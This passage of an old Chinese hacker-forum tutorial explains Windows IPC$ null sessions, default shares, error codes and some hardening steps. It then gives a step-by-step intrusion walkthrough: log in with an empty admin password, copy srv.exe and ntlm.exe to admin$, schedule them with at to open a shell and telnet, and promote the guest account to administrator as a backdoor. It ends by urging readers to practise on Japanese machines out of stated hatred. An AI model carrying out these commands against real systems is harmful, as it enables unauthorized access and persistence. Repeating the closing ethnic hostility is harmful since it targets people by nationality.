Connection)是共享”命名管道”的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows
NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows
NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what
u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令
net share ipc$
来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous
= DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)

八 相关命令
1)建立空连接:
net use \\IP\ipc$ “” /user:”" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ “用户名” /user:”密码” (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ “密码” /user:”用户名”
(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ “” /user:”admintitrators”
这是用《流光》扫到的用户名是administrators,密码为”空”的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现”DONE”的时候,就说明已经启动正常。然后使用”net
start telnet”来开启Telnet服务!

9. Telnet
127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)